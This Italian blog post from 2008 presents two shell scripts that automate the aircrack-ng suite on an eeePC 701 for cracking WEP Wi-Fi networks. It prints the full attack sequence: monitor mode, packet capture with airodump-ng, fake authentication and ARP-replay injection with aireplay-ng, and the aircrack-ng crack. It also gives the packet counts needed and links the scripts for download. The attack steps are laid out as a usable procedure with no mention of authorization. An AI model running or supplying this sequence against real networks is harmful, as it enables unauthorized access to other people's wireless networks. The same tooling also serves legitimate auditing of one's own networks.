»
 

Aircrack-ng su eeePC 701

| ottobre 11th, 2008

Un piccolo script (anzi, due) che semplifica il lancio delle varie parti della suite aircrack-ng. Giusto per non dover scrivere ogni volta tutti i comandi; solitamente sono cose da sbrigare alla svelta.

Utilizzando io Arch Linux sull’eee, lo script cercherà il demone di Networkmanager in /etc/rc.d
se si utilizza Ubuntu o altro modificare in entrambi i file le righe corrispondenti

Il nome della scheda (ath0) non dovrebbe cambiare da una distro all’altra

wifi_monitor

Il primo script mette in modalità monitor la scheda dell’eeepc (si presume ath0), e funziona così:

wifi_monitor [channel] [AP MAC] [Essid]

dove

  • channel: canale della rete da attaccare
  • AP MAC: il mac adress dell’accesspoint
  • Essid: il nome della rete da attaccare

!! Attenzione, il seguente script è da usarsi solo con reti WEP, non WPA !!

Lo script se lanciato correttamente dovrebbe dare un output del genere:

:: Stopping NetworkManager                                               [DONE]

Interface    Chipset        Driver

wifi0        Atheros        madwifi-ng
ath0        Atheros        madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

airodump-ng -c 1 –bssid 00:18:84:A3:9D:AE -w output ath0
aireplay-ng -1 0 -e albuz -a 00:18:84:A3:9D:AE -h 00:15:AF:6C:A3:F0 ath0
aireplay-ng -1 6000 -o 1 -q 10 -e albuz -a 00:18:84:A3:9D:AE -h 00:15:AF:6C:A3:F0 ath0
aireplay-ng -3 -b 00:18:84:A3:9D:AE -h 00:15:AF:6C:A3:F0 ath0
aircrack-ng -z -b 00:18:84:A3:9D:AE output*.cap

Quello che serve sono le ultime 5 righe che sono i comandi da lanciare in ordine su terminali di root diversi.

Airodump sostanzialmente cattura i pacchetti provenienti dall’accesspoint, collezionando sotto la voce “#Data” quelli utilizzabili per lo scopo. Lasciando attivo airodump lanciare il secondo comando su un nuovo terminale (il terzo comando è opzionale) per autenticare la propria scheda presso l’AP. Successivamente lanciare aireplay-ng -3 (quarto comando) per iniziare l’injection di pacchetti. L’output di aireplay, dopo un paio di minuti, da una sola riga diventerà una serie lunghissima di righe (giusto per intenderci); solo allora nel primo terminale (Airodump) sotto la voce “#Data”, il numero  di pacchetti prenderà ad aumentare a vista d’occhio.

Prima di lanciare l’ultimo comando (la crack vera e propria), assicurarsi che i pacchetti Data siano almeno 20000 per una wep a 64bit, 40000 per una a 128bit.

Quando finisce e la password vi viene rivelata, segnatevela e proseguite qui sotto per provare a connettervi..

Riabilitare la scheda in Managed Mode

Per ripristinare lo stato iniziale della scheda, lanciare il secondo script, wifi_managed.

Download

Gli script sono scaricabili QUI

Problemi

Se aireplay-ng -1 fallisce, assicurarsi che i driver siano patchati per abilitare l’Injection!

Non volendo questo essere un tutorial di aircrack-ng o una guida sul crack delle wep, vi consiglio di leggere questo tutorial.

Posted on sabato, ottobre 11th, 2008 at 21:44 in Blog | rss feed for comments| Leave a response, or trackback

Leave a Reply